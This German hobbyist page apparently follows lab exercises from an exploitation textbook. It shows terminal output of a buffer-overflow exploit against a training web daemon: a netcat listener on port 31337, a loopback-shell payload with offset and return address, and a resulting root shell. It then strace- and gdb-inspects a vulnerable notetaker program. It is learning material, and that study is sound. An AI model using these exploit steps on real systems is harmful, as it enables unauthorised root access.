root@tomovic-Satellite-L300:/# cat /var/log/tinywebd.log
09/08/2013 14:38:09> Starting up..
09/08/2013 14:38:29> From 127.0.0.1:45041 "HEAD / HTTP/1.0"  404 Not Found
09/08/2013 14:39:10> Shutting down..

Wichtig ist nur, dass Starting up und shutting down drin ist. Bei mit fehlt die Index.html :-)


Seite 366:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2548
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# jobs
[1]+  Läuft                  nc -l -p 31337 &
!!! Achtung bitte ändert bei euch die Werte in der sh ab.
OFFSET=524
RETADDR="\x24\xf5\xff\xbf"
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xtool_tinywebd_stealth.sh loopback_shell 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (302 b)] [shellcode (83 b)] [ret addr (128 b)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
root

 


09/11/2013 18:20:03> Starting up..
09/11/2013 18:22:54> Starting up..
09/11/2013 18:25:54> From 127.0.0.1:50224 "GET / HTTP/1.1"  404 Not Found

Hat doch ganz gut geklappt :-)

Seite 368:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# strace ./notetaker test
execve("./notetaker", ["./notetaker", "test"], [/* 19 vars */]) = 0
brk(0)                                  = 0x804b000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdb000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=71733, ...}) = 0
mmap2(NULL, 71733, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fc9000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220\232\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1770984, ...}) = 0
mmap2(NULL, 1780508, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e16000
mmap2(0xb7fc3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ad) = 0xb7fc3000
mmap2(0xb7fc6000, 11036, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc6000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e15000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e15900, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fc3000, 8192, PROT_READ)   = 0
mprotect(0x8049000, 4096, PROT_READ)    = 0
mprotect(0xb7ffe000, 4096, PROT_READ)   = 0
munmap(0xb7fc9000, 71733)               = 0
brk(0)                                  = 0x804b000
brk(0x806c000)                          = 0x806c000
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 1), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fda000
write(1, "[DEBUG] buffer   @ 0x804b008: 't"..., 37[DEBUG] buffer   @ 0x804b008: 'test'
) = 37
write(1, "[DEBUG] datafile @ 0x804b070: '/"..., 43[DEBUG] datafile @ 0x804b070: '/var/notes'
) = 43
open("/var/notes", O_WRONLY|O_CREAT|O_APPEND, 0600) = 3
write(1, "[DEBUG] file descriptor is 3\n", 29[DEBUG] file descriptor is 3
) = 29
getuid32()                              = 0
write(3, "\0\0\0\0", 4)                 = 4
write(3, "\n", 1)                       = 1
write(3, "test", 4)                     = 4
write(3, "\n", 1)                       = 1
close(3)                                = 0
write(1, "Note has been saved.\n", 21Note has been saved.
)  = 21
exit_group(0)                           = ?

Man sieht, über die Jahre wurde viel am Kernel gearbeitet.

Seite 369:


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./notetaker
Reading symbols from /home/tomovic/Dokumente/hack/notetaker...done.
(gdb) set dis intel
Ambiguous set command "dis intel": disable-randomization, disassemble-next-line, disassembly-flavor, disconnected-dprintf...
set dis intel ist nicht unbedingt notwendig.

(gdb) disass main
Dump of assembler code for function main:
   0x08048834 <+0>: push   %ebp
   0x08048835 <+1>: mov    %esp,%ebp
   0x08048837 <+3>: and    $0xfffffff0,%esp
   0x0804883a <+6>: sub    $0x20,%esp
   0x0804883d <+9>: movl   $0x64,(%esp)
   0x08048844 <+16>: call   0x80486ea <ec_malloc>
   0x08048849 <+21>: mov    %eax,0x1c(%esp)
   0x0804884d <+25>: movl   $0x14,(%esp)
   0x08048854 <+32>: call   0x80486ea <ec_malloc>
   0x08048859 <+37>: mov    %eax,0x18(%esp)
   0x0804885d <+41>: mov    0x18(%esp),%eax
   0x08048861 <+45>: movl   $0x7261762f,(%eax)
   0x08048867 <+51>: movl   $0x746f6e2f,0x4(%eax)
   0x0804886e <+58>: movw   $0x7365,0x8(%eax)
   0x08048874 <+64>: movb   $0x0,0xa(%eax)
   0x08048878 <+68>: cmpl   $0x1,0x8(%ebp)
   0x0804887c <+72>: jg     0x8048893 <main+95>
   0x0804887e <+74>: mov    0xc(%ebp),%eax
   0x08048881 <+77>: mov    (%eax),%eax
   0x08048883 <+79>: mov    0x18(%esp),%edx
   0x08048887 <+83>: mov    %edx,0x4(%esp)
   0x0804888b <+87>: mov    %eax,(%esp)
   0x0804888e <+90>: call   0x8048808 <usage>
   0x08048893 <+95>: mov    0xc(%ebp),%eax
   0x08048896 <+98>: add    $0x4,%eax
   0x08048899 <+101>: mov    (%eax),%eax
   0x0804889b <+103>: mov    %eax,0x4(%esp)
   0x0804889f <+107>: mov    0x1c(%esp),%eax
   0x080488a3 <+111>: mov    %eax,(%esp)
   0x080488a6 <+114>: call   0x80484d0 <strcpy@plt>
   0x080488ab <+119>: mov    0x1c(%esp),%eax
   0x080488af <+123>: mov    %eax,0x8(%esp)
   0x080488b3 <+127>: mov    0x1c(%esp),%eax
   0x080488b7 <+131>: mov    %eax,0x4(%esp)
   0x080488bb <+135>: movl   $0x8048af3,(%esp)
   0x080488c2 <+142>: call   0x8048490 <printf@plt>
   0x080488c7 <+147>: mov    0x18(%esp),%eax
   0x080488cb <+151>: mov    %eax,0x8(%esp)
   0x080488cf <+155>: mov    0x18(%esp),%eax
   0x080488d3 <+159>: mov    %eax,0x4(%esp)
   0x080488d7 <+163>: movl   $0x8048b10,(%esp)
   0x080488de <+170>: call   0x8048490 <printf@plt>
   0x080488e3 <+175>: movl   $0x180,0x8(%esp)
---Type <return> to continue, or q <return> to quit---^CQuit
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

 


 

   

Websicherheit...  

   
© ALLROUNDER